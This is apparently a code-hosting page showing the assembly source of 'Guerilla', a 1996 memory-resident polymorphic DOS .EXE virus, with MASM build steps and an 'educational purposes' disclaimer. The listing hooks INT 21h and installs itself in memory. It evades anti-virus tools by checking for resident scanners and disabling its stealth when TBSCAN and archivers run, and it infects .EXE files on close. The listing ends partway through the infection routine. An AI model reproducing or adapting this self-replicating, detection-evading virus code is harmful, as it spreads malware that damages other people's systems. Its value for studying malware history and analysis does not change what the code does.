📄 guerilla.asm
字号:
;
; Guerilla 1996
; Memory resident polymorphic DOS .EXE infector
; Brute Force Full Stealth (BFFS)
; Designed to spread fast and avoid detection-nondestructive & no payload
; Requires 386 or above and MS-DOS 5.0 or above
;
; Disclaimer:
; This file is only for educational purposes. The author takes absolutely
; no responsibility for anything that anyone does with this file. Do not
; modify this file.
;
; To compile use MASM:
; masm guerilla
; link guerilla
; (generates guerilla.exe)
;
seg_a segment byte public
assume cs:seg_a , ds:seg_a , ss:seg_a
startvirus:
db 0bdh ; mov bp, XXh
delta dw 0
movax305: mov al, 05h ;
mov ah, 03h ;
;
subbxbx: and bx, 0 ;
nop ;
db 0cdh, 16h ;
movsibp: mov si, bp ;
clc ;
nop ;
call encrypt_decrypt ;
; --------------------------------------------------------------------------
; ENCRYPTION STARTS HERE
;---------------------------------------------------------------------------
outit:
push ds
clc ;
call encrypt_decrypt2 ;
testit:
mov ah, 30h ; Dos-Version ?
int 21h ;
cmp al, 5 ; < 5.0?
jb done ; then no memory launch
push cs
pop ds
lea dx, [bp+rep_input] ;
mov ah, 09h ;
int 21h ;
cmp bx, 3135h ; Already resident?
je done ; then no memory launch
vectorint:
sub ax, ax
mov ds, ax
push ds:[21h*04h] ; Offset of INT 21h
push ds:[21h*04h] ; Offset of INT 21h
push ds:[21h*04h+02h] ; Segment of INT 21h
push ds:[21h*04h+02h] ; Segment of INT 21h
storeints:
pop cs:[bp+int21seg] ; Segment of INT 21h
pop cs:[bp+int21s] ; Segment of INT 21h
pop cs:[bp+int21off] ; Offset of INT 21h
pop cs:[bp+int21o] ; Offset of INT 21h
findavmem:
xor di, di
call checkresav ; No memory launch if AV resident
je done ;
mov ax, es
dec ax
push ax ; DS = segment of programs MCB
pop ds
inc di
mov al, byte ptr ds:[di-1]
cmp al, 'N'
jl done
mov bx, word ptr ds:[di+02h]
sub bx, (endheap-startvirus+0fh)/16+1
jc done ; no memory launch if not enuf mem
mov ax, word ptr ds:[di+11h]
sub ax, (endheap-startvirus+0fh)/16+1
mov word ptr ds:[di+02h], bx
mov word ptr ds:[di+11h], ax
mov es, ax
sub ax, ax
mov ds, ax
cli ; point to new interrupt location
mov word ptr ds:[21h*04h], offset (virusint21-startvirus)
mov word ptr ds:[21h*04h+02h], es
sti
xor di, di
push cs
pop ds
cld
mov cx, endheap-startvirus ;
lea si, [bp+startvirus] ;
rep movsb ; Launch virus into memory
done:
pop ds ; DS -> PSP
push ds ;
pop es ; ES -> PSP
mov ax, es ; AX = PSP segment
add ax, 10h ; Adjust for PSP
add word ptr cs:[bp+longjump+2], ax
db 81h, 0c0h ; add ax, XXXXh
origss dw 0
cli
db 0bch ; mov sp, XXXXh
origsp dw 0
mov ss, ax
sti
sub ax, ax
sub bx, bx
sub cx, cx
sub dx, dx
sub si, si
sub di, di
sub bp, bp
db 0eah
;oooo:ssss ; jmp ssss:oooo
longjump dd 0fff00000h ; Original CS:IP
; --------------------------------------------------------------------------
; int 21h handler
; --------------------------------------------------------------------------
virusint21:
push si
pushf
xor si, si
loopme: cmp ah, byte ptr cs:[lookup+si]
jne more
popf
jmp word ptr cs:[lookup+si+1]
more: add si, 3
cmp si, 3*numberconditions
jne loopme
popf
pop si
jmp go_int
lookup db 4bh
dw offset checkstealth
db 4ch
dw offset checkstealth
db 09h
dw offset repservice
db 11h
dw offset dirstealth
db 12h
dw offset dirstealth
db 4eh
dw offset findstealth
db 4fh
dw offset findstealth
db 3dh
dw offset cleanvirus
db 3eh
dw offset infectfile
db 6ch
dw offset cleanvirus
db 32h
dw offset checkstealth
checkstealth:
push ax
push bx
push di
mov di, offset (tbscan-1)
mov bx, di
cmp ah, 32h
je turnoff
cmp ah, 4ch
je turnon
mov si, dx
periodlp: cmp byte ptr [si], '.'
je foundperiod
cmp byte ptr [si], 0
je leaveit
inc si
jmp periodlp
foundperiod:
scanmore:
dec si
inc di
mov al, byte ptr cs:[di]
cmp al, byte ptr [si]
je scanmore
cmp al, ' '
je turnoff ; found one of the bad ones
add bx, 8
mov di, bx
cmp byte ptr cs:[di+1], 0
jne periodlp
turnon: mov cs:[stealthon], 1 ; enable all stealth functions
jmp short leaveit
turnoff: mov cs:[stealthon], 0 ; disable all stealth functions
leaveit:
pop di
pop bx
pop ax
pop si
jmp go_int
tbscan db 'NACSBT ' ; programs that stealth is
win db 'NIW ' ; disabled for
tbsetup db 'PUTESBT ' ;
pkzip db 'PIZKP ' ;
arj db 'JRA ' ;
rar db 'RAR ' ;
lha db 'AHL ' ;
adinf db 'FNIDA ' ;
db 00h
; ----------------------------------------------------------------------
; INT 21 ah=3eh
; ----------------------------------------------------------------------
infectfile:
push ax
push bx
push cx
push dx
push di
push es
push ds
pushf
push cs
pop ds
cmp bl, 5 ; is file handle<5?
jb findquit ; then quit
call checkdrive ; floppy?
jb findquit ; then quit
cmp cs:[stealthon], 0 ; is stealth off?
jz findquit ; then quit
call sft ; get sft
mov sftes, es ; store ES for later
mov sftdi, di ; store DI for later
cmp word ptr es:[di+28h],'XE' ; check .EXE file extension
jne findquit ;
cmp byte ptr es:[di+2Ah],'E' ;
jne findquit ;
call checkmarker ; check marker #2
jz findquit ;
call movepointertotop ; move sft pointer to TOF
lea dx, [header] ; read header
call readheader ;
jc findquit ; quit if cant read header
cmp word ptr [si+18h], 40h ; windows file?
je findquit ; then quit
mov ah, byte ptr [si+0h] ; check for 'M' in header
xor ah, 'M' ;
jne findquit ;
mov ax, word ptr [si+12h] ; check marker #1
ror ax, 1 ;
sub ax, 23 ;
cmp ax, word ptr [si+0Eh] ; SS
jz findquit ; quit if already infected
mov ax, 4202h ; get absolute file length
xor cx, cx ;
cwd ;
call simint21h ; get file length in DX:AX
mov sizems, dx ; save size in dx for later
mov sizels, ax ; save size in ax for later
or dx, dx ; check filesize
jz checklow1 ;
cmp dx, 5 ; too big?
ja findquit ; then quit
jmp checkheader ; else continue
checklow1:
cmp ax, 5000 ; too small?
jb findquit ; then quit
checkheader:
mov ax, word ptr [si+04h] ; convert size in header
mov cx, 512 ; from pages to bytes
mul cx ;
mov cx, word ptr [si+02h] ;
or cx, cx ;
jz comparesize ;
sub ax, 512 ;
sbb dx, 0 ;
add ax, cx ;
adc dx, 0 ;
comparesize:
cmp ax, sizels ; <> means overlays or bad header
jne findquit ;
cmp dx, sizems ; <> means overlays or bad header
jne findquit ;
mov dx,word ptr es:[di+20h] ; check filename against
lea si, [avtable2] ; list of programs not to infect
mov cx, numberav ; number in list
rock:
lodsw ;
cmp ax, dx ;
je findquit ; quit if found a bad one
loop rock ;
; file is definitely ready to infect now
push ds
pop es
lea si, [header+14h] ; save original CS:IP
lea di, [longjump] ;
movsw ; DS:SI -> ES:DI
movsw ;
sub si, 0ah ; save original SS:SP
lea di, [origss] ;
movsw ; DS:SI -> ES:DI
inc di ;
inc di ;
movsw ;
sub si, 12h ; top of header
push si ; copy clean copy of file header
lea di, [origheader] ;
cld ;
mov cx, 18h ;
repz movsb ;
pop si ;
mov ax,5700h ; get file time/date
call simint21h ;
mov time, cx ; save time for later
mov date, dx ; save date for later
call encryptheader ; encrypt original header copy
mov es, sftes ; SFT in ES:DI
mov di, sftdi ;
mov ax, sizels ; LSW of file size in AX
mov dx, sizems ; MSW or file size in DX
mov word ptr es:[di+15h],ax ; point SFT to EOF
mov word ptr es:[di+17h],dx ;
mov cx, 16
div cx
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -